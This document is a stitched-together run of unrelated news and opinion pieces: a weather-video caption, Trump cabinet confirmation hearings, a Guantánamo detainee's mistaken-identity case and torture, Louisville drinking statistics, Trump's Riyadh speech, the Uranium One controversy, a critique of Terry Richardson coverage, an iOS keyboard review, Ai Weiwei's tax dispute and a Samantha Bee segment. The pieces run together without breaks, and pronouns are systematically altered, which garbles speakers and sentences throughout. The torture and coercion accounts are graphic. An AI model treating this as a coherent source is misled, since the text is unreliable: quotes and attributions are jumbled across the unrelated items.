Climate and water outlook : May - July 2017 3:56 The monthly Climate and Water Outlook video covers rainfall , streamflow and temperature for the next three months . Courtesy : YouTube/Bureau of Meteorology
megan.palin @ news.com.au
Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe : report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort 's attorneys say they should get less than 10 years in prison MORE 's cabinet nominees are dissenting from their views during their confirmation hearings — and that is just fine with those in the GOP who are skeptical of the president-elect .
Nominees for major posts including would-be Secretary of State Rex Tillerson and attorney general-designate Sen. Jeff Sessions Jefferson ( Jeff ) Beauregard SessionsTrump says they have n't spoken to Barr about Mueller report Ex-Trump aide : Ca n't imagine Mueller not giving House a ‘ roadmap ' to impeachment Rosenstein : My time at DOJ is 'coming to an end ' MORE ( R-Ala. ) have differed from Trump on topics as diverse as waterboarding and the Trans-Pacific Partnership ( TPP ) .
Republicans who are wary of Trump take that as a good sign — not only because of the specifics of the positions outlined by the nominees , but because they see it as evidence that Trump 's cabinet might be able to rein them in .
“ There are a lot of opportunities for their cabinet nominees to influence him , to be the ones that set the direction of policy , ” said Dan Judy , a GOP consultant whose firm worked for the 2016 presidential bid of one Trump rival , Sen. Marco Rubio Marco Antonio RubioHillicon Valley : Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Trump unleashing digital juggernaut ahead of 2020 MORE ( R-Fla. ) .
“ Generally , it is the president who sets the agenda , ” Judy added . “ In this case , I do n't think we are going to have a president who has particularly strong convictions on these issues . ”
Trump is adamant that all will be fine . Speaking briefly to reporters in the lobby of Trump Tower on Friday , the president-elect said the differences “ will all get straightened out . ”
“ We want them to be themselves , ” they added , referring to their nominees . “ I told them , ‘ Be yourself , and say what you want to say , do n't worry about me . ' I 'm going to do the right thing , whatever it is . I may be right , they may be right . But I said , ‘ Be yourself . ' ”
Trump supporters take comments like those as a sign that they will remain true to their own political instincts rather than being coopted by more establishment figures .
But the fact remains that the list of significant differences between Trump and their nominees grew almost every day during the first confirmation hearings .
Trump 's deeply contentious proposal to ban non-citizen Muslims from entering the United States remains on their website , even though aides have said they have moved away from the idea . There is also confusion over whether the president-elect is open to some kind of Muslim registry .
Sessions was clear-cut before the Senate Judiciary Committee last week . “ I do not support the idea that Muslims as a religious group should be denied entry to the United States , ” they said .
The Alabama senator also said , “ I would not favor a registry of Muslims in the United States , ” adding that they thought the government should “ avoid surveillance of religious institutions unless there 's a basis to believe that dangerous or threatening illegal activity is going on there . ”
Tillerson has said they do not oppose the TPP , despite Trump having blasted the trade agreement over and over again . A few weeks after their election win , the president-elect released a video in which they promised to issue an intent to withdraw from the TPP , which they called “ a potential disaster for our country . ”
It is not just Sessions and Tillerson who have failed to toe the Trump line .
Gen. John Kelly ( ret . ) , the nominee to lead the Department of Homeland Security , was asked whether they accepted the intelligence community 's reports into alleged Russian hacking during the election . Kelly replied , “ With high confidence . ”
Trump only acknowledged for the first time last week that they believed Russia was responsible for hacks of the Democratic National Committee and Hillary Clinton Hillary Diane Rodham ClintonSanders : ' I fully expect ' fair treatment by DNC in 2020 after 'not quite even handed ' 2016 primary Sanders : 'Damn right ' I 'll make the large corporations pay 'fair share of taxes ' Former Sanders campaign spokesperson : Clinton staff are 'biggest a -- holes in American politics ' MORE aide John Podesta ; they had previously cast considerable doubt on that conclusion .
Another retired general , James Mattis , who has been nominated as Secretary of Defense , has said they would not oppose the Iran nuclear deal , an accord that Trump has repeatedly weighed in against .
Trump aides have played down the importance of these differences , even as they insist that the president , not their cabinet members , will be deciding policy .
On a conference call with reporters on Thursday , transition spokesperson Sean Spicer said that “ at the end of the day , each one of them will pursue a Trump agenda and a Trump vision . ”
But , more broadly , Spicer said Trump was “ not asking for clones . He 's asking for people to go out and , because of their expertise…make sure he 's got the best advice and [ is ] pursing the best policies . ”
A similar note was sounded by Rep. Trent Franks Harold ( Trent ) Trent FranksArizona New Members 2019 Cook shifts 8 House races toward Dems Freedom Caucus members see openings in leadership MORE ( R-Ariz. ) on Friday , as they told NBC News ' Katy Tur that Trump was not seeking “ automatons. ” Franks said they themselves disagree with the president-elect on some issues , and “ he knows that and they understand that . ”
Among those more skeptical of Trump , though , there are growing hopes that would-be cabinet members can bend the president-elect to their views .
Rick Tyler , a GOP strategist who worked for Sen. Ted Cruz Rafael ( Ted ) Edward CruzTrump unleashing digital juggernaut ahead of 2020 Inviting Kim Jong-un to Washington Trump endorses Cornyn for reelection as O'Rourke mulls challenge MORE ( Texas ) during the 2016 Republican primaries , said they suspected Trump would “ actually be quite flexible ” once in office , in part because “ he has n't really had a library of fixed policies . ”
But Tyler also expressed some concern as to whether Trump was guided by anything other than the popularity of a given course of action — something that could complicate policy consistency , if the policy in question ceases to be expedient .
“ At heart , they are a populist and they will adjust their polices not based on some ideological or principled foundation , but on whether the country wants them to do it , ” Tyler said . “ I do n't think I 've ever heard Trump try to persuade the country on a particular policy . If the country does n't like the policy , it would be Trump 's style to adjust the course . ”
Dan Judy largely agreed , arguing that the battles between Trump and their nominees may be just beginning .
“ I think anybody in this administration is going to be performing a bit of a high-wire act , ” they said .
Ben Kamisar contributed .
Two protesters of the detention center at Guantánamo Bay look solemnly toward the White House . ( Photo : Rebecca Nelson / Medill News Service )
Before Barack Obama left office , they released 10 detainees from Guantánamo to Oman . Among them was Abdul Zahir , a 45-year-old man from Afghanistan . Zahir was detained at Guantánamo for 14 years , even though the US government later admitted that they were wrongfully held . They were mistaken for another man who shared their nickname , Abdul Bari . Zahir 's story exemplifies the cruelty of Guantánamo and the policies of indefinite detention and torture , which will , in all likelihood , continue with Trump as president .
“ I want to leave behind the bad things that happened to me while I have been imprisoned . I want to focus on the positive things ahead of me , seeing my family again , studying at university and perhaps being able to help others , ” Zahir said , according a press release provided by their lawyers before they left Guantánamo . Zahir has three sons and speaks Arabic , Pashto and some Urdu , Farsi and English . Before their capture , they worked as a translator , shuttle driver and Arabic teacher .
US troops captured Zahir on July 11 , 2002 , during a raid in Afghanistan targeting another man named Abdul Bari — an alias also used by Zahir . The raid occurred at a compound in Hesarak village , which is a few miles east of Kabul and northeast of Gardez . Abdul Bari ( not Zahir ) allegedly helped produce and distribute chemical or biological weapons for al-Qaeda .
A day or two after the raid , US forces recovered “ suspicious items , ” according to a military intelligence assessment , including a white powder that they initially believed was a chemical or biological agent . However , on later examination , the substances turned out to be salt , sugar and petroleum jelly . When the Periodic Review Board determined , on July 11 , 2016 , that Abdul Zahir should be released , it also concluded that Zahir “ was probably misidentified as the individual who had ties to al-Qaeda weapons facilitation . ”
Zahir was not the only Guantánamo detainee detained because of a mistaken identity . In fact , another Guantánamo detainee among those released to Oman — Yemeni Mustafa al Shamiri — was also mistaken for another man with a similar name .
Torture and Assault in Guantánamo
Like every Guantánamo detainee , Zahir was tortured . Their military defense lawyer , US Air Force Lt. Col. Sterling Thomas told Truthout that after Zahir 's capture , US forces “ gave them the treatment that they thought every Brown person , every Muslim person they captured deserved — they tortured him . ”
Zahir was tortured by US forces at Bagram Air Base in Afghanistan and at Guantánamo , where they were transferred on October 27 , 2002 .
Thomas explained that Zahir suffered beatings , exposure to cold temperatures , cramped confinement , stress positions , hog-tying and sexual assault . “ He would be kept in very small rooms with the air conditioning unit running full blast without proper clothing — so , a pair of shorts — and an iron bed , ” Thomas said . Zahir “ would be placed in interrogation rooms right under the air conditioner and they would make the room as cold as possible , with their hands tied to their waist , and then they would be tied into a fetal position on the floor in that very cold room. ” In addition , Zahir “ spent a year in a room that they called ‘ a cage for animals . ' And in that room , they had to eat , sleep , exercise and shower all in the same place . Including elimination of waste . ”
During the time they spent in that small room , a group of US troops would come into the room “ wearing outfits meant to make them frightened ” and “ would spray a burning gas above their head , ” while they were shirtless . Those troops would “ drop them to the floor and two people would sit on their lower back and tie their hands and feet behind him , ” a practice known as “ hog-tying. ” They would “ then pick them up like a sheep and take them elsewhere where they would quickly immerse them in water that was flowing fast from a very big pipe. ” After that , they would “ take them back to where they were and drop them from about one meter onto the ground still tied. ” Guards also grabbed and pulled their testicles “ violently , until they fell unconscious . ”
As a result of their torture , Zahir “ suffered physically and emotionally. ” They experienced major depressive episodes that led them to attempt suicide . Zahir protested their treatment on numerous occasions . In one instance , after they protested , a group of guards in riot gear ( Forced Cell Extraction team ) tackled Zahir and “ damaged their spine so badly that they had to conduct surgery , ” said Thomas . Since then , Zahir has had to walk with a walker and experiences internal organ issues .
Zahir 's torture was par for the course at Guantánamo . As documented by human rights groups like the Center for Constitutional Rights , beatings , shackling , sexual assault and other forms of abuse have been standard practice at Guantánamo , particularly in its early years . During the 2013 hunger strike , striking prisoners were force-fed , which is also a form of torture . Torture violates international law , particularly the UN Convention Against Torture .
For years , defense lawyers tried to get Zahir released , or at least secure a fair trial . Vermont lawyer Robert Gensburg challenged Zahir 's confinement with a habeas corpus action but was unsuccessful . Zahir was then brought up for trial before a military commission , which is when fellow Vermont lawyer David Sleigh and military co-counsel Lt. Col. Sterling Thomas joined Zahir 's defense team .
In 2006 , Zahir was charged with conspiracy , materially supporting terrorism and killing civilians in connection with a grenade attack that wounded Canadian journalist Kathleen Kenna . However , the military commission temporarily shut down , their case never went to trial , and charges were dismissed . According to Thomas , Zahir made numerous , contradictory statements under torture — statements that the US government tried to use against them — but there was no physical evidence tying them to the attack . Thomas also mentioned that part of the reason Zahir was held for so long is because the US government tortured them and did not want those details made public in a civilian court .
How Do Mistaken Identity Cases Occur ?
New Guantánamo intelligence reveals that the vast majority of detainees are not the “ worst of the worst ” as the US government claimed , according to the Miami Herald . In fact , some of those who were captured and incarcerated at Guantánamo had nothing to do with al-Qaeda .
This reality has always been clear to some people within the US government . One of them is Mark Fallon , a retired 30-year federal investigator who , from 2002 to 2004 , headed the Pentagon 's Criminal Investigation Task Force ( CITF ) , established to investigate cases that would be brought before a military commission . In the early days , Fallon said it was clear to them and CITF that most of the people arriving at Guantánamo were not the super-villain terrorists portrayed by the US government . “ We were frankly shocked at who wound up there going on the first plane loads . It was clear it was n't senior al-Qaeda leadership or main al-Qaeda men . It was just people who were kind of scooped up and a lot of them were paid bounties for . They were not very effectively , for the most part , screened very well in Afghanistan , ” Fallon explained to Truthout .
Only 5 percent of Guantánamo detainees were captured by US forces . Meanwhile , 86 percent were captured by Afghan tribal allies or Pakistani security forces and handed over to US custody , according to a Seton Hall study . The detainees captured by Pakistan or Afghan tribal allies “ were handed over to the United States at a time in which the United States offered large bounties for capture of suspected enemies. ” Very few were actually al-Qaeda fighters . “ Only 8 % of the detainees were characterized as al Qaeda fighters , ” according to the study , while 40 percent had “ no definitive connection with al Qaeda ” and 18 percent had “ no definitive affiliation with either al Qaeda or the Taliban . ”
It 's not a huge surprise that false charges and cases of mistaken identity occurred amid this race to incarcerate . Fallon said that JTF-GTMO ( Joint Task Force Guantánamo ) , which runs the Guantánamo prison , was looking for anything to pin on detainees . For example , part of JTF-GTMO 's threat indication criteria was whether a detainee possessed a common item like a Casio F-91W or A159W wristwatch because it was “ the sign of al-Qaida , [ which ] uses the watch to make bombs , ” which Fallon called “ sad ” and “ comical. ” Fallon said CITF concluded “ an overwhelming majority ” of detainees had no intelligence or investigative value and should be released , while JTF-GTMO argued for further detention . However , it was JTF-GTMO 's assessments that caught the White House 's ear , while voices like Fallon 's were marginalized . Fallon shares their insider perspective on how the US government implemented torture in a book called Unjustifiable Means : The Inside Story of How the CIA , Pentagon , and US Government Conspired to Torture .
Meanwhile , Abdul Zahir will be attempting to get back on their feet , reunite with their family and begin rebuilding a life that was all but shattered . Despite their torture and horrific treatment at the hands of the US government , Zahir says they do not hate the United States or harbor any bitter feelings . Rather , they are focused on moving their life forward . Sterling called Zahir 's resolve “ remarkable ” and said , “ He 's been through things that no human being should have to suffer through . Regardless of what they did . And they had done nothing that was a crime . ”
Moving on could be difficult for Zahir . Many former Guantánamo and CIA black site detainees continue to face mental health problems even after being released , such as depression and post-traumatic stress . That makes it difficult for them to readjust into normal society . This means true justice for Guantánamo detainees entails more than just releasing them to another country . It also must include redress for the torture inflicted upon them and the physical , mental and emotional problems resulting from that abuse .
However , true justice does not currently seem within reach for current and former Guantánamo detainees . There arecurrently 41 detainees in Guantánamo , including 26 held in indefinite detention — people whom the government does not have enough untainted evidence to prosecute but claims are too dangerous to release . Like torture , indefinite detention also violates international human rights law . While the Trump administration has dropped the idea of reopening secret prisons , it does want to keep the Guantánamo prison open and put new detainees there . According to the Miami Herald , the Guantánamo military prison could hold another 200 or so prisoners .
Support Independent Journalism We only have two days left to raise the $ 23,000 still urgently needed for Truthout . If you 've ever found information or inspiration in what we publish , please donate what you can !
Copyright , Truthout . May not be reprinted without permission .
CLOSE A recent website mentioned Louisville as one of the most mispronounced cities . We asked people on the street how they pronounce it . By Michael Clevenger , The CJ
Survey says Louisville is Kentucky 's drunkest city ( Photo : Karen Moskowitz , Getty Images )
A report reveals that Louisville is the heaviest drinking city in Kentucky . Not surprising for the place that first sold bottled bourbon to drinkers .
But people who live in the Bluegrass State are actually less likely than the typical American adult to consume unhealthy amounts of alcohol .
The survey , which was conducted by the financial news and opinion company 24/7 Wall St. , offers some interesting insights into our drinking habits .
Only about 16.3 percent of adults in Kentucky drink excessively . That 's a smaller share than 18 percent of American adults . That 's interesting , considering it 's the place that 's internationally known as the home of bourbon .
You may like : Is Louisville the North or the South ? Let 's decide this once and for all
Excessive drinking , according to the Centers for Disease Control and Prevention , includes binge drinking — defined as four or more drinks in a single occasion for women and five or more for men — and heavy drinking , which is defined as at least eight drinks per week for women and 15 for men .
The same survey that ranked Louisville as the drunkest city in Kentucky found Bloomington , not Indianapolis , to have the highest binge drinking rates in Indiana .
The Bloomington metro area is the home of Indiana University , one of the largest universities in the country . Nearly one in four Bloomington metro area residents are enrolled in college or graduate school , the third-highest share in the country , and 19.7 percent of residents over the age of 18 drink excessively , the largest share of any Indiana metro .
NEWSLETTERS Get the Dining newsletter delivered to your inbox We 're sorry , but something went wrong The latest on Louisville dining , recipes , the city 's celebrity chefs and more ! Please try again soon , or contact Customer Service at 1-800-866-2211 . Delivery : Fri Invalid email address Thank you ! You 're almost signed up for Dining Keep an eye out for an email to confirm your newsletter registration . More newsletters
This is timely : Don your best 1930s attire and celebrate the repeal of prohibition at this special speakeasy
For reference , the states with the lowest excessive drinking rates are concentrated in the South , while most of the states with the highest excessive drinking rates are in the Midwest .
Click here for 24/7 's article and the full list of The Drunkest Cities in Every State .
Reach Kirby Adams at kadams @ courier-journal.com Twitter @ kirbylouisville Support strong local journalism by subscribing today : www.courier-journal.com/kirbya
On the hunt for Pappy Van Winkle ? : You have until Dec. 9 to enter the Kroger lottery
Read or Share this story : https : //www.courier-journal.com/story/life/2017/11/28/louisville-drunkest-city-kentucky/899427001/
On Sunday in Riyadh , Saudi Arabia , Donald Trump delivered a speech sending a message of unity , and calling for the leaders of the Middle East to drive Islamic extremist terrorists out of their countries . “ This is not a battle between different faiths , different sects , or different civilizations , ” they said . “ This is a battle between barbaric criminals who seek to obliterate human life , and decent people of all religions who seek to protect it . ”
After referring to terrorists as “ the foot soldiers of evil , ” Trump continued , “ If we do not stand in uniform condemnation of this killing , then we not only will be judged by our people , not only will be judged by history , but we will be judged by God . ”
Their message , delivered to leaders of more than fifty Muslim countries from the birthplace of Islam , was a complete turnabout from their decidedly anti-Islam message during their campaign . “ America is a sovereign nation and our first priority is always the safety and security of our citizens , ” they continued . “ We are not here to lecture—we are not here to tell other people how to live , what to do , who to be , or how to worship . Instead , we are here to offer partnership—based on shared interests and values—to pursue a better future for us all . ”
Trump contextualized the war against terrorism in a stark , black-and-white contrast , calling it , “ a battle between good and evil . ”
“ Barbarism will deliver you no glory — piety to evil will bring you no dignity , ” they said . “ If you choose the path of terror , your life will be empty , your life will be brief , and your soul will be condemned . ”
President Donald Trump hammered the media Thursday for paying more attention to Russian collusion claims than a shady uranium deal with a Russian company approved of by Hillary Clinton , while they were serving as secretary of state .
' I think that 's your Russia story . That 's your real Russia story . Not a story where they talk about collusion , which there was none . It was hoax ' Trump told reporters in the Oval Office , as they gathered with Puerto Rico 's Gov . Ricardo Rosselló .
The Senate is now sniffing around the Uranium One deal , which gave 20 percent of the country 's uranium to Russia , as parties associated with the deal were giving money to the Clinton Foundation – and the company itself was being investigated in an FBI probe .
Trump told reporters that it was the story of 'the decade ' and slammed the mainstream media for not reporting it .
'And frankly it 's a disgrace , ' Trump said . 'It 's a disgrace and it 's a disgrace that the fake news wo n't cover it . It 's so sad . '
A number of outlets reported Wednesday that Judiciary Committee Chairman Chuck Grassley stated in letters to agencies that they are looking into potential 'conflicts of interest ' that Hillary Clinton may have had when they sat on the committee that approved the Uranium One transaction .
Scroll down for video
President Trump spoke about the questionable Uranium One deal in the Oval Office Thursday , calling it 'your real Russia story , ' as it hits political rival Hillary Clinton
The deal that took place while Clinton was secretary of state has attracted the attention of the Senate
Judiciary Committee Chairman Chuck Grassley said Wednesday that they are looking into potential 'conflicts of interest ' that Hillary Clinton may have had when they sat on the committee that approved the Uranium One transaction
Grassley also said Wednesday that their investigation will center on aRussian uranium deal that was approved by the Obama administration despite an ongoing FBI investigation of the company concerned .
'It turns out during the transaction , the Justice Department had an ongoing criminal investigation for bribery , extortion and money laundering into officials for the Russian company making that purchase , ' Grassley said during a Capitol Hill hearing . 'While all of this was going on , the Clinton Foundation reportedly received millions of dollars from interested parties in the transaction . '
The Hill newspaper also reported that a key FBI informant , an American business person with knowledge of the Russian nuclear industry 's efforts to woo the Clintons and the Obama administration , was blocked by President Obama 's Justice Department last year from telling Congress what they knew .
Senate Judiciary Committee Chairman Chuck Grassley , R-Iowa , is trying to get to the bottom of the Russian uranium deal . They find it suspicious that involved parties had donated to the Clinton Foundation
Trump picked up on the story this morning , tagging Fox & Friends in one of the messages - an indication that he 'd been watching author Peter Schweizer 's appearance on the program
Peter Schweizer is the author of the book Clinton Cash . They hopped on Fox this morning to comment on Sen. Chuck Grassley 's announcement
In 2010 , the Committee on Foreign Investment in the United States approved a deal that allowed Russia 's Rosatom nuclear company to buy Canadian mining company Uranium One , which controlled about 20 percent of the U.S. 's uranium deposits , which was why the multi-agency committee was involved .
Sitting on that committee were former Attorney General Eric Holder and former Secretary of State Clinton , whose husband , ex-President Bill Clinton , had collected speaking fees and Clinton Foundation donations by parties associated with the deal .
Details about the donations were previously revealed in author Peter Schweizer 's book , Clinton Cash .
Schweizer appeared Thursday morning on Fox & Friends , with President Trump tweeting 'Russia sent millions to Clinton Foundation ' and tagging the morning show , indicating that they had tuned in .
Trump also tweeted , 'Uranium deal to Russia , with Clinton help and Obama Administration knowledge , is the biggest story that Fake Media does n't want to follow ! '
However , the New York Times had investigated the deal as Schweizer 's book was coming out and agreed with many of the authors findings : that interested parties had indeed flowed money to the Clinton Foundation as Secretary of State Clinton made them determination .
'Whether the donations played any role in the approval of the uranium deal is unknown , ' the Times report said .
'But the episode underscores the special ethical challenges presented by the Clinton Foundation , headed by a former president who relied heavily on foreign cash to accumulate $ 250 million in assets even as their wife helped steer American foreign policy as secretary of state , presiding over decisions with the potential to benefit the foundation 's donors , ' it continued .
Now there 's a new layer to the story , as the Hill newspaper reported this week that the FBI had uncovered a Russian bribery plot in 2009 and 2010 , before the committee green-lit the deal .
The Justice Department also waited until 2014 to bring any charges .
Grassley wants to find out why .
They told their Senate committee Wednesday , in front of witness Attorney General Jeff Sessions , that they had sent 10 letters out last week asking questions about who in the government knew about the FBI probe and when .
'In my letter , I asked the agencies involved in approving the transaction if they were aware of the criminal probe and the intelligence operation examining Russian activity , ' Grassley explained .
Former President Bill Clinton was given Clinton Foundation dollars and speaking fees by parties associated with the Russian uranium deal - while their wife , then Secretary of State Hillary Clinton , had to approve of it for it to go through
The Iowa Republican also asserted that 'Russians involved in the conspiracy were reportedly coordinating with high-level officials , close to Vladimir Putin .
Turning their attention to Sessions , Grassley asked , 'What are you doing to find out how a Russian takeover of American uranium was allowed to occur despite criminal conduct by a Russian company that the Obama administration approved to make the purchase ? '
Sessions said they heard Grassley 's concerns and promised they would be reviewed .
'It would n't be appropriate for me to comment on any ongoing investigation , ' Sessions also said .
If Sessions ' Justice Department did probe the deal it would be a marked difference from how the Obama administration 's Justice Department handled it , according to the lawyer representing the FBI 's informant , according to the Hill .
Lawyer Victoria Toensing , who worked in the Reagan Justice Department and was the former chief counsel of the Senate Judiciary Committee , told the paper Tuesday they are working with lawmakers to push the Trump Justice Department or the FBI in freeing up their client to speak with members of Congress .
They told the Hill that their client possesses details on how Russian executives facilitated the 2010 Uranium One deal , sending millions of dollars in Russian nuclear funds to an entity that was then supporting the Clinton Foundation .
But last year , during the presidential election , they were not allowed to speak out , having signed a non-disclosure agreement at the behest of the FBI .
'There was corruption going on and it was never brought forward . And in fact , the sale of the uranium went on despite the government knowing about all of this corruption . So he 's coming forward , ' Toensing told the paper . 'He wants the right thing to be done , but they can not do it unless they are released from the NDA . '
Schweizer took credit for the FBI 's investigation and Grassley 's inquiry in their Thursday appearance on Fox . They further urged the FBI to lift its gag order on the secret , Uranium One witness .
'There is absolutely no reason , I think , any justification , for this guy to be under a gag order anymore , ' Schweizer said . 'Let them testify before Congress . Let them go to the media and tell their story and then people can decide what they think about what they have to say . '
The Department of Justice did not respond to an inquiry from DailyMail.com on the gag order and whether it would remove it .
In a 7,400-word epic feature in New York magazine , Benjamin Wallace asks : “ Is Terry Richardson an Artist or a Predator ? ” This is a curious false dichotomy—I confess I 've never seen the appeal of Richardson 's work ( “ It 's just a girl shot with harsh lighting on a white background , BUT I came on their face ! ” ) , but it is of course possible to be both . More importantly , the question of whether someone is an artist is a matter of opinion and taste . The question of whether he 's a predator seems like it should come down to fact .
But Wallace treats that question as a matter of opinion , too . And that 's not because he 's a bad reporter , or because the article is n't impressively thorough . It 's because Wallace is writing it from within a culture that thinks a woman 's experience is a matter of debate .
Advertisement :
Terry Richardson , for those of you who have been lucky enough to miss all this , is a well-known fashion and celebrity photographer . You 've seen their work , even if you do n't know their name : bright flash , white background , nude breasts , girls with milk or food all over their faces . He 's collaborated with Lady Gaga ; they directed a video for Miley Cyrus . ( A nude one , naturally . ) And he 's been accused multiple times , both in print and in lawsuits , of pressuring models into sexual acts they did n't want to do .
More from DAME : `` Everyone 's Having a Baby But Me ''
Richardson does n't bother to deny that they often shed their clothes during shoots ( he 's just trying to make the girls feel comfortable ! ) and that they like to insert himself , Hitchcock-like , into every photography session . Unlike Hitchcock , they often insert themselves literally , by having models touch their penis or give them a blowjob or have sex with him . They do n't dispute this ; they just feels it 's not a problem . The models , at least the majority of the ones who have spoken up , tend to feel that it is .
Wallace 's piece treats this as a legitimate dispute and aims to show both sides . It has many of the hallmarks of a balanced investigative profile , and anyone taking it at face value might believe it to be exactly that : an even-handed treatment of an embattled man . But in fact , it only looks balanced because Richardson , the article , and the culture they operate in are skewed in the same ways . All of them treat a woman 's experience of sexual coercion as something others can weigh in on , evaluate , and probably reject .
Over and over throughout the piece , Wallace will outline a model 's story of feeling pressured and exploited , being told to do whatever it takes and then finding out that “ whatever it takes ” requires them to perform sexually in a way they did n't bargain for . And then Richardson or one of their pals will breeze in and explain that Terry has a big dick , or that women want to be told they 're beautiful , or that they seemed into it at the time , or that Terry always said “ if you do n't want to , that 's cool. ” This is , in the strictest of senses , showing both sides . But one side is a woman talking about their personal experience , and the other is a man and their supporters saying she 's wrong .
More from DAME : `` My Late Awakening ''
Advertisement :
We 're told that Richardson 's assistant ( and , according to Jezebel , girlfriend ) Alex Bolotow dismisses the allegations , saying that “ Trying to put the onus onto someone else for your own decisions is really cowardly and kind of dishonest. ” We 're told that Chloë Sevigny dressed up as them and kissed them on the cheek , that Helmut Newton is a fan of their work , that professional gross opinion-haver Gavin McInnes likes the same sandwich as they do . ( In fairness , it sounds like a really good sandwich . ) We 're told Jared Leto 's opinion , for some unfathomable reason . But it 's not just possible for Richardson to be a sexual predator whose friends think he 's a great guy—it 's downright likely . Cases of rape are often played this way , as though sexual assault were a personality contest : He 's a real mensch , she 's a bitch and a slut , so who are you going to believe ? Roman Polanski is an admitted child rapist and they still have a small red carpet 's worth of celebrity pals willing to attest to their warmth and good humor .
The perceptions do n't make the man here ; this is n't “ Terry Richardson Has a Cold. ” If a girl says “ he told me to have sex with him , but I did n't want to , ” their unwillingness is not up for discussion ; you ca n't retroactively celebrity-testimony them into feeling comfortable and empowered and pressure-free . People saying Richardson is n't a creep does n't prove that they are n't a creep . It just proves that there will always be people willing to make excuses for men who exploit and prey upon women , by insisting that women 's emotions must be fake or overblown—by showing the “ other side ” of their experience , the one where they 're wrong about what they think they wanted .
“ At some level , whether you believe Richardson was sexually coercive hinges on a judgment of the power dynamic in any given photo shoot , and of the agency of young models in the moral vacuum of the fashion world , ” says Wallace , before going on to quote a single model , Freja Beha , who feels Richardson “ has never taken me anywhere I 've felt uncomfortable with. ” But it does n't hinge on that at all . It hinges on whether the young models feel sexually coerced . The money quote is n't Beha 's “ he 's one of the most sensitive people in the business. ” It 's model Sara Ziff saying “ I felt pressured to comply because my agent had told me to make a good impression because they were an important photographer who shot for all the major magazines and brands. ” It 's Gabriela Johansson avowing , in the lawsuit they filed against Richardson , that their shoot made them “ extremely uncomfortable. ” It 's Rie Rasmussen telling Richardson “ what you do is completely degrading to women. ” Jamie Peck writing that “ I can remember doing this stuff , but even at the time , it was sort of like watching someone else do it , someone who could n't possibly be me because I would never touch a creepy photographer 's penis , ” and adding that the incident “ left me feeling like I needed to take two showers. ” Anna del Gaizo admitting that Richardson shoving their penis in their face made them “ disgusted and unnerved ” although “ I did n't want to act afraid ; I was outnumbered , and I thought showing fear or outright shock would lead to something worse. ” Charlotte Waters saying that their experience was “ disgusting and it makes me cringe . ”
More from DAME : `` In Praise of Surrogate Mothers ''
Advertisement :
Is Richardson a predator ? They are a man with power and influence who tells teenage girls to suck their dick when they do n't feel empowered to refuse , so yes . Their behavior is predatory ; they use their relative strength and their relative weakness to get what they want . The fact that they and their friends will disingenuously protest that these girls are mistaken about how they feel , and the fact that this gets treated with equal weight as the models ' own testimonies , only means that they all live in the same messed-up society as the rest of us .
When one side is saying “ I felt used and exploited ” and the other is saying “ no you did n't , ” that 's not balance ; it only looks that way if you believe that a woman 's sense of safety is less important than a man 's art .
Fortunately for Terry Richardson , a lot of people do .
If you 're an iPhone or iPad user who also uses Microsoft 's Office 365 platform , then the newly-released Hub Keyboard for iOS is well worth taking a look at .
What 's special about the Hub Keyboard is that it allows you to get stuff done directly from the keyboard , which means that you spend less time switching between apps .
The Hub Keyboard has three tricks up its sleeve :
It allows you to easily insert previously copied text without having to mess around with the iOS cut/copy/paste user interface
It offers the facility for searching for OneDrive and SharePoint documents so you can send links to them to others
It allows you to access both the contacts from your iPhone and your Office 365 account
If you 're not an Office 365 user then there 's probably not much to draw you into using the Hub Keyboard ( other than perhaps the ability to insert copied text ) , but for those who use OneDrive or SharePoint , this is well worth a look .
I have noticed a problem , though . Specifically , the keyboard is slow to bring up , but this is a complaint that I 'd level against pretty much every third-party keyboard for iOS I 've tried .
The Hub Keyboard is free to download , and works with iPhones , iPads , or iPod touch devices running iOS 9.1 or later .
See also :
Ai said 'those in power have the right to do anything and their power faces no restrictions '
Chinese dissident Ai Weiwei says they have deposited a $ 1.3m guarantee into a government bank account out of concern for their associates after tax officials threatened to turn their investigation into their company over to police .
The outspoken artist has been locked in a dispute with authorities who say Ai 's Beijing Fake Cultural Development company owes $ 2.4m in back taxes and fines .
`` It 's very simple , '' Ai said in a phone interview on Tuesday . `` Those in power have the right to do anything and their power faces no restrictions . ''
Ai , an internationally acclaimed conceptual artist , was taken away by police to a secret location for nearly three months earlier this year during a wide-ranging crackdown on dissent .
The artist was the most high-profile target of a sweeping crackdown on activists that started in February in a bid to prevent protests similar to those in the Middle East and North Africa . They were released on bail in June .
Ai disputes the government 's tax-evasion allegations and says they do not even own the company involved .
The company wants to fight the tax bill , but had to put down a guarantee of $ 1.3m to do so .
'Threat is real '
Beijing tax bureau officials told Ai 's wife Lu Qing , the company 's legal representative , that they wanted the bond paid into one of the tax bureau 's bank accounts .
They said if the company missed the Wednesday deadline to do so , the case would be sent to police , Ai said .
`` They were , of course , issuing a threat to us , but the threat is real , '' they said .
Supporters have raised for $ 1.4m for Ai , but the artist and their company 's lawyers said transferring the money into the tax bureau 's accounts could be seen as admitting guilt , and that if they win the case it would be difficult to get the money back .
Instead , Ai was planning to be the guarantor and offer a bank certificate of deposit as collateral .
Ai said concern for the safety of their associates prompted them to give in to the tax bureau 's demand .
`` If you do n't do it this way , they might send you to the public security , then the public security organ can use some other procedure , under the charge of refusing to pay taxes , to do what , I do n't know , '' Ai said .
`` Of course , this would have been very unsafe for a lot of people . ''
Their company 's lawyers say the tax bureau 's demand is illegal . Repeated phone calls to the Beijing Local Taxation Bureau 's propaganda department rang unanswered on Tuesday .
Ai said that if the case were to go to the police it was possible that they would detain their wife as the firm 's legal representative .
Since Donald Trump and their minions love conspiracy theories so much , Samantha Bee decided to see what it was like to spread one of their own Monday night . And it already has its own hashtag : # TrumpCantRead .
As the Full Frontal host said in a segment that premiered on Facebook Live , Bee began by reviewing tape of a recently unsealed deposition in which Trump was repeatedly asked to read from legal documents and refused , first saying they did n't have their glasses and then using the excuse that he 's not a lawyer . “ Objection ! ” Bee said . “ How can you expect someone who is n't a fancy-pants lawyer to read words ? ”
“ At first , I thought Trump was lying , but then it hit me , ” Bee said . “ You heard it here first : People are saying Donald Trump ca n't read. ” Over the next six minutes , they meticulously laid out the evidence , including the fact that the only book title Trump can recall when people ask them what he 's read recently is All Quiet on the Western Front and their unnerving practice of shouting things they want to tweet at their staffers during the day . Even their signature is suspiciously missing recognizable letters .
